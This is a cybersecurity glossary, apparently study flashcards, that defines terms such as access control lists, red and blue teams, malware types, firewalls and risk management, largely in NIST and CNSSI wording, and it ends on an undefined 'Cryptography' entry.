Cybersecurity
Identity Management Software
- Automates keeping track of all users and privileges - Authenticates users, protecting identities, controlling access
Authentication
- Password systems - Tokens - Smart cards - Biometric authentication
Access Control List (ACL)
1. A list of permissions associated with an object. The list specifies who or what is allowed to access the object and what operations are allowed to be performed on the object. 2. A mechanism that implements access control for a system resource by enumerating the system entities that are permitted to access the resource and stating, either implicitly or explicitly, the access modes granted to each entity.
Blue Team
1. The group responsible for defending an enterprise's use of information systems by maintaining its security posture against a group of mock attackers (i.e., the Red Team). Typically the Blue Team and its supporters must defend against real or simulated attacks 1) over a significant period of time, 2) in a representative operational context (e.g., as part of an operational exercise), and 3) according to rules established and monitored with the help of a neutral group refereeing the simulation or exercise (i.e., the White Team). 2. The term Blue Team is also used for defining a group of individuals that conduct operational network vulnerability evaluations and provide mitigation techniques to customers who have a need for an independent technical review of their network security posture. The Blue Team identifies security threats and risks in the operating environment, and in cooperation with the customer, analyzes the network environment and its current state of security readiness. Based on the Blue Team findings and expertise, they provide recommendations that integrate into an overall community security solution to increase the customer's cyber security readiness posture. Often times a Blue Team is employed by itself or prior to a Red Team employment to ensure that the customer's networks are as secure as possible before having the Red Team test the systems.
White Team
1. The group responsible for refereeing an engagement between a Red Team of mock attackers and a Blue Team of actual defenders of their enterprise's use of information systems. In an exercise, the White Team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender's mission. The White Team helps to establish the rules of engagement, the metrics for assessing results and the procedures for providing operational security for the engagement. The White Team normally has responsibility for deriving lessons-learned, conducting the post engagement assessment, and promulgating results. 2. Can also refer to a small group of people who have prior knowledge of unannounced Red Team activities. The White Team acts as observers during the Red Team activity and ensures the scope of testing does not exceed a predefined threshold.
Access Level
A category within a given security classification limiting entry or system connectivity to only authorized persons. SOURCE: CNSSI-4009
Cross-Certificate
A certificate used to establish a trust relationship between two Certification Authorities.
Certification
A comprehensive assessment of the management, operational, and technical security controls in an information system, made in support of security accreditation, to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system.
Trojan Horse
A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the program.
Virus
A computer program that can copy itself and infect a computer without permission or knowledge of the user. A virus might corrupt or delete data on a computer, use email programs to spread itself to other computers, or even erase everything on a hard disk.
Buffer Overflow
A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.
Backup
A copy of files and programs made to facilitate recovery, if necessary.
IT Security Architecture
A description of security principles and an overall approach for complying with the principles that drive the system design; i.e., guidelines on the placement and implementation of specific security services within various distributed computing environments. IT Security Awareness - The purpose of awareness presentations is simply to focus attention on security. Awareness presentations are intended to allow individuals to recognize IT security concerns and respond accordingly.
Wireless Access Point (WAP)
A device that acts as a conduit to connect wireless communication devices together to allow them to communicate and create a wireless network.
Certificate
A digital representation of information which at least 1) identifies the certification authority issuing it, 2) names or identifies its subscriber, 3) contains the subscriber's public key, 4) identifies its operational period, and 5) is digitally signed by the certification authority issuing it. 2. A set of data that uniquely identifies an entity, contains the entity's public key and possibly other information, and is digitally signed by a trusted party, thereby binding the public key to the entity. Additional information in the certificate could specify how the key is used and its cryptoperiod.
Radio Frequency Identification - (RFID)
A form of automatic identification and data capture (AIDC) that uses electric or magnetic fields at radio frequencies to transmit information.
Firewall
A gateway that limits access between networks in accordance with local security policy. A hardware/software capability that limits access between networks and/or systems in accordance with a specific security policy. A device or program that controls the flow of network traffic between networks or hosts that employ differing security postures.
Cyberspace
A global domain within the information environment consisting of the interdependent ne`twork of information systems infrastructures including the Internet, telecommunications networks, computer systems, and embedded processors and controllers.
Red Team
A group of people authorized and organized to emulate a potential adversary's attack or exploitation capabilities against an enterprise's security posture. The Red Team's objective is to improve enterprise Information Assurance by demonstrating the impacts of successful attacks and by demonstrating what works for the defenders (i.e., the Blue Team) in an operational environment.
Wireless Local Area Network - (WLAN)
A group of wireless networking devices within a limited geographic area, such as an office building, that exchange data through radio communications. The security of each WLAN is heavily dependent on how well each WLAN component—including client devices, APs, and wireless switches—is secured throughout the WLAN lifecycle, from initial WLAN design and deployment through ongoing maintenance and monitoring.
Risk Model
A key component of a risk assessment methodology (in addition to assessment approach and analysis approach) that defines key terms and assessable risk factors.
Whitelist
A list of discrete entities, such as hosts or applications that are known to be benign and are approved for use within an organization and/or information system.
Blacklist
A list of email senders who have previously sent span to a user. A list of discrete entities, such as hosts or applications, that have been previously determined to be associated with malicious activity.
Asset
A major application, general support system, high impact program, physical plant, mission critical system, personnel, equipment, or a logically related group of systems.
Compensating Security Control
A management, operational, and/or technical control (i.e., safeguard or countermeasure) employed by an organization in lieu of a recommended security control in the low, moderate, or high baselines that provides equivalent or comparable protection for an information system. A management, operational, and technical control (i.e., safeguard or countermeasure) employed by an organization in lieu of the recommended control in the baselines described in NIST Special Publication 800-53 or in CNSS Instruction 1253, that provide equivalent or comparable protection for an information system.
Brute Force Password Attack
A method of accessing an obstructed device through attempting multiple combinations of numeric and/or alphanumeric passwords.
Sandboxing
A method of isolating application modules into distinct fault domains enforced by software. The technique allows untrusted programs written in an unsafe language, such as C, to be executed safely within the single virtual address space of an application. Untrusted machine interpretable code modules are transformed so that all memory accesses are confined to code and data segments within their fault domain. Access to system resources can also be controlled through a unique identifier associated with each domain. A restricted, controlled execution environment that prevents potentially malicious software, such as mobile code, from accessing any system resources except those for which the software is authorized.
Buffer Overflow Attack
A method of overloading a predefined amount of space in a buffer, which can potentially overwrite and corrupt data in memory.
Cloud Computing
A model for enabling on-demand network access to a shared pool of configurable IT capabilities/ resources (e.g., networks, servers, storage, applications, and services) that can be rapidly provisioned and released with minimal management effort or service provider interaction. It allows users to access technology-based services from the network cloud without knowledge of, expertise with, or control over the technology infrastructure that supports them. This cloud model is composed of five essential characteristics (on-demand selfservice, ubiquitous network access, location independent resource pooling, rapid elasticity, and measured service); three service delivery models (Cloud Software as a Service [SaaS], Cloud Platform as a Service [PaaS], and Cloud Infrastructure as a Service [IaaS]); and four models for enterprise access (Private cloud, Community cloud, Public cloud, and Hybrid cloud). Note: Both the user's data and essential security services may reside in and be managed within the network cloud.
External Network
A network not controlled by the organization.
Physically Isolated Network
A network that is not connected to entities or systems outside a physically controlled space.
Internal Network
A network where: (i) the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or (ii) cryptographic encapsulation or similar security technology provides the same effect. An internal network is typically organization-owned, yet may be organization-controlled while not being organization-owned. A network where 1) the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors; or 2) cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints provides the same effect (at least with regard to confidentiality and integrity). An internal network is typically organization-owned, yet may be organization-controlled while not being organization-owned.
Network Sniffing
A passive technique that monitors network communication, decodes protocols, and examines headers and payloads for information of interest. It is both a review technique and a target identification and analysis technique.
Biometric
A physical or behavioral characteristic of a human being. 2. A measurable physical characteristic or personal behavioral trait used to recognize the identity, or verify the claimed identity, of an applicant. Facial images, fingerprints, and iris scan samples are all examples of biometrics.
Logic Bomb
A piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met.
Remediation Plan
A plan to perform the remediation of one or more threats or vulnerabilities facing an organization's systems. The plan typically includes options to remove threats and vulnerabilities and priorities for performing the remediation.
Defense-in-Breadth
A planned, systematic set of multidisciplinary activities that seek to identify, manage, and reduce risk of exploitable vulnerabilities at every stage of the system, network, or sub-component life cycle (system, network, or product design and development; manufacturing; packaging; assembly; system integration; distribution; operations; maintenance; and retirement).
Root Cause Analysis
A principle-based, systems approach for the identification of underlying causes associated with a particular set of risks.
Intranet
A private network that is employed within the confines of a given enterprise (e.g., internal to a business or agency).
Key Logger
A program designed to record which keys are pressed on a computer keyboard used to obtain passwords or encryption keys and thus bypass other security measures.
Spam Filtering Software
A program that analyzes emails to look for characteristics of spam, and typically places messages that appear to be spam in a separate email folder.
SOURCE: CNSSI-4009 Malware
A program that is inserted into a system, usually covertly, with the intent of compromising the confidentiality, integrity, or availability of the victim's data, applications, or operating system or of otherwise annoying or disrupting the victim.
Zombie
A program that is installed on a system to cause it to attack other systems.
Antivirus Software
A program that monitors a computer or network to identify all major types of malware and prevent or contain malware incidents.
Antispyware Software
A program that specializes in detecting both malware and nonmalware forms of spyware.
Audit Trail
A record showing who has accessed an Information Technology (IT) system and what operations the user has performed during a given period. A chronological record that reconstructs and examines the sequence of activities surrounding or leading to a specific operation, procedure, or event in a security relevant transaction from inception to final result.
Graduated Security
A security system that provides several levels (e.g., low, moderate, high) of protection based on threats, risks, available technology, support services, time, human concerns, and economics.
Security Policy
A set of criteria for the provision of security services. It defines and constrains the activities of a data processing facility in order to maintain a condition of security for systems and data.
Threat Scenario
A set of discrete threat events, associated with a specific threat source or multiple threat sources, partially ordered in time.
Baseline Configuration
A set of specifications for a system, or Configuration Item (CI) within a system, that has been formally reviewed and agreed on at a given point in time, and which can be changed only through change control procedures. The baseline configuration is used as a basis for future builds, releases, and/or changes.
Rootkit
A set of tools used by an attacker after gaining root-level access to a host to conceal the attacker's activities on the host and permit the attacker to maintain root-level access to the host through covert means.
Application
A software program hosted by an information system. Software program that performs a specific function directly for a user and can be executed without access to system control, monitoring, or administrative privileges.
Risk Management Framework
A structured approach used to oversee and manage risk for an enterprise.
Honeypot
A system (e.g., a Web server) or system resource (e.g., a file on a server) that is designed to be attractive to potential crackers and intruders and has no authorized users other than its administrators.
Misnamed Files
A technique used to disguise a file's content by changing the file's name to something innocuous or altering its extension to a different type of file, forcing the examiner to identify the files by file signature versus file extension.
Penetration Testing
A test methodology in which assessors, typically working under specific constraints, attempt to circumvent or defeat the security features of an information system. Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, system, or network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.
Basic Testing
A test methodology that assumes no knowledge of the internal structure and implementation detail of the assessment object. Also known as black box testing.
Web Bug
A tiny image, invisible to a user, placed on Web pages in such a way to enable third parties to track use of Web servers and collect information about the user, including IP address, host name, browser type and version, operating system name and version, and cookies. SOURCE: SP 800-28 Malicious code, invisible to a user, placed on Web sites in such a way that it allows third parties to track use of Web servers and collect information about the user, including IP address, host name, browser type and version, operating system name and version, and Web browser cookie.
Interview
A type of assessment method that is characterized by the process of conducting discussions with individuals or groups within an organization to facilitate understanding, achieve clarification, or lead to the location of evidence, the results of which are used to support the determination of security control effectiveness over time.
Incident
A violation or imminent threat of violation of computer security policies, acceptable use policies, or standard security practices. An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies. An assessed occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system; or the information the system processes, stores, or transmits; or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.
Virtual Private Network (VPN)
A virtual network, built on top of existing physical networks, that provides a secure communications tunnel for data and other information transmitted between networks.
Macro Virus
A virus that attaches itself to documents and uses the macro programming capabilities of the document's application to execute and propagate.
Cross Site Scripting (XSS)
A vulnerability that allows attackers to inject malicious code into an otherwise benign website. These scripts acquire the permissions of scripts generated by the target website and can therefore compromise the confidentiality and integrity of data transfers between the website and client. Websites are vulnerable if they display user supplied data from requests or forms without sanitizing the data so that it is not executable.
Disaster Recovery Plan (DRP)
A written plan for recovering one or more information systems at an alternate facility in response to a major hardware or software failure or destruction of facilities. Management policy and procedures used to guide an enterprise response to a major loss of enterprise capability or damage to its facilities. The DRP is the second plan needed by the enterprise risk managers and is used when the enterprise must recover (at its original facilities) from a loss of capability over a period of hours or days.
Risk Response
Accepting, avoiding, mitigating, sharing, or transferring risk to organizational operations (i.e., mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation.
Remote Access
Access to an organizational information system by a user (or an information system acting on behalf of a user) communicating through an external network (e.g., the Internet). Access by users (or information systems) communicating external to an information system security perimeter. The ability for an organization's users to access its nonpublic computing resources from external locations other than the organization's facilities. Access to an organization's nonpublic information system by an authorized user (or an information system) communicating through an external, non-organization-controlled network (e.g., the Internet).
Recovery Procedures
Actions necessary to restore data files of an information system and computational capability after a system failure.
Cyber Incident
Actions taken through the use of computer networks that result in an actual or potentially adverse effect on an information system and/or the information residing therein. See Incident.
Computer Network Attack (CNA)
Actions taken through the use of computer networks to disrupt, deny, degrade, or destroy information resident in computers and computer networks, or the computers and networks themselves.
Countermeasure
Actions, devices, procedures, or techniques that meet or oppose (i.e., counters) a threat, a vulnerability, or an attack by eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken. 2. Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of an information system. Synonymous with security controls and safeguards.
Awareness (Information Security)
Activities which seek to focus an individual's attention on an (information security) issue or set of issues.
Chief Information Officer (CIO)
Agency official responsible for: 1) Providing advice and other assistance to the head of the executive agency and other senior management personnel of the agency to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, Executive Orders, directives, policies, regulations, and priorities established by the head of the agency; 2) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the agency; and 3) Promoting the effective and efficient design and operation of all major information resources management processes for the agency, including improvements to work processes of the agency.
Information Security Policy
Aggregate of directives, regulations, rules, and practices that prescribes how an organization manages, protects, and distributes information.
False Positive
An alert that incorrectly indicates that malicious activity is occurring.
Business Impact Analysis (BIA)
An analysis of an information system's requirements, functions, and interdependencies used to characterize system contingency requirements and priorities in the event of a significant disruption. An analysis of an enterprise's requirements, processes, and interdependencies used to characterize information system contingency requirements and priorities in the event of a significant disruption.
Major Application
An application that requires special attention to security due to the risk and magnitude of harm resulting from the loss, misuse, or unauthorized access to or modification of the information in the application. Note: All federal applications require some level of protection. Certain applications, because of the information in them, however, require special management oversight and should be treated as major. Adequate security for other applications should be provided by security of the systems in which they operate.
Online Attack
An attack against an authentication protocol where the Attacker either assumes the role of a Claimant with a genuine Verifier or actively alters the authentication channel. The goal of the attack may be to gain authenticated access or learn authentication secrets.
Passive Attack
An attack against an authentication protocol where the Attacker intercepts data traveling along the network between the Claimant and Verifier, but does not alter the data (i.e., eavesdropping).
Jamming
An attack in which a device is used to emit electromagnetic energy on a wireless network's frequency to make it unusable. An attack that attempts to interfere with the reception of broadcast communications.
Eavesdropping Attack
An attack in which an Attacker listens passively to the authentication protocol to capture information which can be used in a subsequent active attack to masquerade as the Claimant.
Man-in-the-middle Attack - (MitM)
An attack on the authentication protocol run in which the Attacker positions himself in between the Claimant and Verifier so that he can intercept and alter data traveling between them. or A form of active wiretapping attack in which the attacker intercepts and selectively modifies communicated data to masquerade as one or more of the entities involved in a communication association.
Flooding
An attack that attempts to cause a failure in a system by providing more input than the system can process properly.
Distributed Denial of Service (DDoS)
An attack that uses many computers to perform a DoS attack.
Off-line Attack
An attack where the Attacker obtains some data (typically by eavesdropping on an authentication protocol run, or by penetrating a system and stealing security files) that he/she is able to analyze in a system of his/her own choosing.
Cyber Attack
An attack, via cyberspace, targeting an enterprise's use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information.
Attack
An attempt to gain unauthorized access to system services, resources, or information, or an attempt to compromise system integrity. Any kind of malicious activity that attempts to collect, disrupt, deny, degrade, or destroy information system resources or the information itself.
Information Security Architecture
An embedded, integral part of the enterprise architecture that describes the structure and behavior for an enterprise's security processes, information security systems, personnel and organizational sub-units, showing their alignment with the enterprise's mission and strategic plans.
Inside(r) Threat
An entity with authorized access (i.e., within the security domain) that has the potential to harm an information system or enterprise through destruction, disclosure, modification of data, and/or denial of service.
Inside Threat
An entity with authorized access that has the potential to harm an information system through destruction, disclosure, modification of data, and/or denial of service
Image
An exact bit-stream copy of all electronic data on a device, performed in a manner that ensures that the information is not altered.
Red Team Exercise
An exercise, reflecting real-world conditions, that is conducted as a simulated adversarial attempt to compromise organizational missions and/or business processes to provide a comprehensive assessment of the security capability of the information system and organization.
Low-Impact System
An information system in which all three security objectives (i.e., confidentiality, integrity, and availability) are evaluated as low.
Demilitarized Zone (DMZ)
An interface on a routing firewall that is similar to the interfaces found on the firewall's protected side. Traffic moving between the DMZ and other interfaces on the protected side of the firewall still goes through the firewall and can have firewall protection policies applied. A host or network segment inserted as a "neutral zone" between an organization's private network and the Internet. Perimeter network segment that is logically between internal and external networks. Its purpose is to enforce the internal network's Information Assurance policy for external information exchange and to provide external, untrusted sources with restricted access to releasable information while shielding the internal networks from outside attacks.
Credential
An object or data structure that authoritatively binds an identity (and optionally, additional attributes) to a token possessed and controlled by a Subscriber.
Outside Threat
An unauthorized entity from outside the domain perimeter that has the potential to harm an Information System through destruction, disclosure, modification of data, and/or denial of service.
Outside(r) Threat
An unauthorized entity outside the security domain that has the potential to harm an information system through destruction, disclosure, modification of data, and/or denial of service.
Patch
An update to an operating system, application, or other software issued specifically to correct particular problems with the software.
Threat Monitoring
Analysis, assessment, and review of audit trails and other information collected for the purpose of searching out system events that may constitute violations of system security.
Threat
Any circumstance or event with the potential to adversely impact organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation through an information system via unauthorized access, destruction, disclosure, modification of information, and/or denial of service.
Event
Any observable occurrence in a network or system. Any observable occurrence in a system and/or network. Events sometimes provide indication that an incident is occurring.
Security Information and Event Management (SIEM) Tool -
Application that provides the ability to gather security data from information system components and present that data as actionable information via a single interface.
Assessment Findings
Assessment results produced by the application of an assessment procedure to a security control or control enhancement to achieve an assessment objective; the execution of a determination statement within an assessment procedure by an assessor that results in either a satisfied or other than satisfied condition.
Hardening
Configuring a host's operating systems and applications to reduce the host's security weaknesses.
Anti-spoof
Countermeasures taken to prevent the unauthorized use of legitimate Identification & Authentication (I&A) data, however it was obtained, to mimic a subject different from the attacker.
Recovery Oriented Computing
Designing systems that recover quickly with capabilities to help operators pinpoint and correct faults in multi-component systems
Compromise
Disclosure of information to unauthorized persons, or a violation of the security policy of a system in which unauthorized intentional or unintentional disclosure, modification, destruction, or loss of an object may have occurred.
Implant
Electronic device or electronic equipment modification designed to gain unauthorized interception of information-bearing emanations.
Digital Evidence
Electronic information stored or transferred in digital form.
Authentication
Encompasses identity verification, message origin authentication, and message content authentication.
Availability
Ensuring timely and reliable access to and use of information. The property of being accessible and useable upon demand by an authorized entity.
Flaw
Error of commission, omission, or oversight in an information system that may allow protection mechanisms to be bypassed.
IT Security Awareness and Training Program
Explains proper rules of behavior for the use of agency IT systems and information. The program communicates IT security policies and procedures that need to be followed. Explains proper rules of behavior for the use of agency information systems and information. The program communicates IT security policies and procedures that need to be followed (i.e., NSTISSD 501, NIST SP 800-50).
Level of Protection
Extent to which protective measures, techniques, and procedures must be applied to information systems and networks based on risk, threat, vulnerability, system interconnectivity considerations, and information assurance needs. Levels of protection are: 1. Basic: information systems and networks requiring implementation of standard minimum security countermeasures. 2. Medium: information systems and networks requiring layering of additional safeguards above the standard minimum security countermeasures. 3. High: information systems and networks requiring the most stringent protection and rigorous security countermeasures.
Threat Assessment
Formal description and evaluation of threat to an information system. SOURCE: SP 800-53; SP 800-18 Process of formally evaluating the degree of threat to an information system or enterprise and describing the nature of the threat.
Security Plan
Formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements. See 'System Security Plan' or 'Information Security Program Plan.'
Information Security Program Plan
Formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management controls and common controls in place or planned for meeting those requirements.
Security Program Plan
Formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management security controls and common security controls in place or planned for meeting those requirements.
Disk Imaging
Generating a bit-for-bit copy of the original media, including free space and slack space.
Assurance
Grounds for confidence that the other four security goals (integrity, availability, confidentiality, and accountability) have been adequately met by a specific implementation. "Adequately met" includes (1) functionality that performs correctly, (2) sufficient protection against unintentional errors (by users or software), and (3) sufficient resistance to intentional penetration or by-pass. The grounds for confidence that the set of intended security controls in an information system are effective in their application. Measure of confidence that the security features, practices, procedures, and architecture of an information system accurately mediates and enforces the security policy.
Computer Incident Response Team - (CIRT)
Group of individuals usually consisting of Security Analysts organized to develop, recommend, and coordinate immediate mitigation actions for containment, eradication, and recovery resulting from computer security incidents. Also called a Computer Security Incident Response Team (CSIRT) or a CIRC (Computer Incident Response Center, Computer Incident Response Capability, or Cyber Incident Response Team).
Integrity
Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity. 2.The property that sensitive data has not been modified or deleted in an unauthorized and undetected manner.
Intrusion Detection Systems (IDS)
Hardware or software product that gathers and analyzes information from various areas within a computer or a network to identify possible security breaches, which include both intrusions (attacks from outside the organizations) and misuse (attacks from within the organizations.)
Internal Security Controls
Hardware, firmware, or software features within an information system that restrict access to resources only to authorized subjects.
Malicious Logic
Hardware, firmware, or software that is intentionally included or inserted in a system for a harmful purpose.
Baseline
Hardware, software, databases, and relevant documentation for an information system at a given point in time.
Easter Egg
Hidden functionality within an application program, which becomes activated when an undocumented, and often convoluted, set of commands and keystrokes are entered. Easter eggs are typically used to display the credits for the development team and are intended to be nonthreatening.
ISACA (Information Systems Audit and Control Association)
ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves.
IT Security Education
IT Security Education seeks to integrate all of the security skills and competencies of the various functional specialties into a common body of knowledge, adds a multidisciplinary study of concepts, issues, and principles (technological and social), and strives to produce IT security specialists and professionals capable of vision and proactive response.
IT Security Training
IT Security Training strives to produce relevant and needed security skills and competencies by practitioners of functional specialties other than IT security (e.g., management, systems design and development, acquisition, auditing). The most significant difference between training and awareness is that training seeks to teach skills, which allow a person to perform a specific function, while awareness seeks to focus an individual's attention on an issue or set of issues. The skills acquired during training are built upon the awareness foundation, in particular, upon the security basics and literacy material.
IS Policies *MOST IMPORTANT ONE*
IT equipment issued by the company is corporate property. Anything you use the equipment for can be monitored and reviewed.
Risk Management
Identify, control, and minimize the impact of threats
Likelihood of Occurrence
In Information Assurance risk analysis, a weighted factor based on a subjective analysis of the probability that a given threat is capable of exploiting a given vulnerability.
Cyber Infrastructure
Includes electronic information and communications systems and services and the information contained in these systems and services. Information and communications systems and services are composed of all hardware and software that process, store, and communicate information, or any combination of all of these elements. Processing includes the creation, access, modification, and destruction of information. Storage includes paper, magnetic, electronic, and all other media types. Communications include sharing and distribution of information. For example: computer systems; control systems (e.g., supervisory control and data acquisition-SCADA); networks, such as the Internet; and cyber services (e.g., managed security services) are part of cyber infrastructure.
Audit
Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes in controls, policies, or procedures. Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures.
Privileged Accounts
Individuals who have access to set "access rights" for users on a given system. Sometimes referred to as system or network administrative accounts.
Defense-in-Depth
Information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.
Control Information
Information that is entered into a cryptographic module for the purposes of directing the operation of the module.
Personally Identifiable Information - (PII)
Information which can be used to distinguish or trace an individual's identity, such as their name, social security number, biometric records, etc., alone, or when combined with other personal or identifying information which is linked or linkable to a specific individual, such as date and place of birth, mother's maiden name, etc.
Non-Repudiation
Is the security service by which the entities involved in a communication cannot deny having participated. Specifically, the sending entity cannot deny having sent a message (non-repudiation with proof of origin), and the receiving entity cannot deny having received a message (non-repudiation with proof of delivery). A service that is used to provide assurance of the integrity and origin of data in such a way that the integrity and origin can be verified and validated by a third party as having originated from a specific entity in possession of the private key (i.e., the signatory).
Risk Monitoring
Maintaining ongoing awareness of an organization's risk environment, risk management program, and associated activities to support risk decisions.
File Security
Means by which access to computer files is limited to authorized users only.
IT Security Metrics
Metrics based on IT security performance goals and objectives.
Boundary Protection
Monitoring and control of communications at the external boundary of an information system to prevent and detect malicious and other unauthorized communication, through the use of boundary protection devices (e.g., proxies, gateways, routers, firewalls, guards, encrypted tunnels).
Assessment Method
One of three types of actions (i.e., examine, interview, test) taken by assessors in obtaining evidence during an assessment.
Continuous Monitoring -
Ongoing monitoring sufficient to ensure and assure effectiveness of security controls related to systems, networks, and cyberspace, by assessing security control implementation and organizational security status in accordance with organizational risk tolerance
Boundary
Physical or logical perimeter of a system.
Removable Media
Portable electronic storage media such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device, and that is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. Examples include hard disks, floppy disks, zip drives, compact disks (CDs), thumb drives, pen drives, and similar USB storage devices.
Confidentiality
Preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information.
Risk Mitigation -
Prioritizing, evaluating, and implementing the appropriate risk reducing controls/countermeasures recommended from the risk management process.
Configuration Control
Process of controlling modifications to hardware, firmware, software, and documentation to protect the information system against improper modification prior to, during, and after system implementation.
Security Testing
Process to determine that an information system protects data and maintains functionality as intended.
Data Security
Protection of data from unauthorized (accidental or intentional) modification, destruction, or disclosure.
Safeguards
Protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.
Indicator of Compromise (IOC)
Recognized action, specific, generalized, or theoretical, that an adversary might be expected to take in preparation for an attack. A sign that an incident may have occurred or may be currently occurring.
Criticality Level
Refers to the (consequences of) incorrect behavior of a system. The more serious the expected direct and indirect effects of incorrect behavior, the higher the criticality level.
Privacy
Restricting access to subscriber or Relying Party information in accordance with federal law and agency policy.
External Auditors
Review internal audit results and perform independent information systems audit
Walkthrough
Review of specification or design document by small group of qualified people
Viruses
Rogue software program that attaches itself to other software programs or data files in order to be executed
Access List
Roster of individuals authorized admittance to a controlled area. SOURCE: CNSSI-4009
Internal Security Testing
Security testing conducted from inside the organization's security perimeter.
External Security Testing
Security testing conducted from outside the organization's security perimeter.
Overt Testing
Security testing performed with the knowledge and consent of the organization's IT staff.
Passive Security Testing
Security testing that does not involve any direct interaction with the targets, such as sending packets to a target.
Black Box Testing
See Basic Testing.
Vulnerability Analysis
See Vulnerability Assessment. Vulnerability Assessment - Formal description and evaluation of the vulnerabilities in an information system. Systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.
Malicious Applets
Small application programs that are automatically downloaded and executed and that perform an unauthorized function on an information system.
Malicious Code
Software or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.
Internet Protocol (IP)
Standard protocol for transmission of data from source to destinations in packet-switched communications networks and interconnected systems of such networks.
Quarantine
Store files containing malware in isolation for future disinfection or examination.
IP Security (IPsec)
Suite of protocols for securing Internet Protocol (IP) communications at the network layer, layer 3 of the OSI model by authenticating and/or encrypting each IP packet in a data stream. IPsec also includes protocols for cryptographic key establishment.
Critical Infrastructure
System and assets, whether physical or virtual, so vital to the U.S. that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters. [Critical Infrastructures Protection Act of 2001, 42 U.S.C. 5195c(e)]
Covert Testing
Testing performed using covert methods and without the knowledge of the organization's IT staff, but with the full knowledge and permission of upper management.
IT Security Policy
The "documentation of IT security decisions" in an organization. NIST SP 800-12 categorizes IT Security Policy into three basic types: 1) Program Policy—high-level policy used to create an organization's IT security program, define its scope within the organization, assign implementation responsibilities, establish strategic direction, and assign resources for implementation. 2) Issue-Specific Policies—address specific issues of concern to the organization, such as contingency planning, the use of a particular methodology for systems risk management, and implementation of new regulations or law. These policies are likely to require more frequent revision as changes in technology and related factors take place. 3) System-Specific Policies—address individual systems, such as establishing an access control list or in training users as to what system actions are permitted. These policies may vary from system to system within the same organization. In addition, policy may refer to entirely different matters, such as the specific managerial decisions setting an organization's electronic mail (email) policy or fax security policy.
Internet
The Internet is the single, interconnected, worldwide system of commercial, governmental, educational, and other computer networks that share (a) the protocol suite specified by the Internet Architecture Board (IAB), and (b) the name and address spaces managed by the Internet Corporation for Assigned Names and Numbers (ICANN).
Information System Resilience
The ability of an information system to continue to operate while under attack, even if in a degraded or debilitated state, and to rapidly recover operational capabilities for essential functions after a successful attack. The ability of an information system to continue to: (i) operate under adverse conditions or stress, even if in a degraded or debilitated state, while maintaining essential operational capabilities; and (ii) recover to an effective operational posture in a time frame consistent with mission needs.
Password Protected
The ability to protect a file using a password access control, protecting the data contents from being viewed with the appropriate viewer unless the proper password is entered.
Cybersecurity
The ability to protect or defend the use of cyberspace from cyber attacks.
Resilience
The ability to quickly adapt and recover from any known or unknown changes to the environment through holistic implementation of risk management, contingency, and continuity planning. The ability to continue to: (i) operate under adverse conditions or stress, even if in a degraded or debilitated state, while maintaining essential operational capabilities; and (ii) recover to an effective operational posture in a time frame consistent with mission needs.
Remediation
The act of correcting a vulnerability or eliminating a threat. Three possible types of remediation are installing a patch, adjusting configuration settings, or uninstalling a software application.
Maximum Tolerable Downtime
The amount of time mission/business processes can be disrupted without causing significant harm to the organization's mission.
Digital Forensics
The application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
Steganography
The art and science of communicating in a way that hides the existence of the communication. For example, a child pornography image can be hidden inside another graphic image file, audio file, or other file format.
Failover
The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby information system upon the failure or abnormal termination of the previously active system.
Cryptography
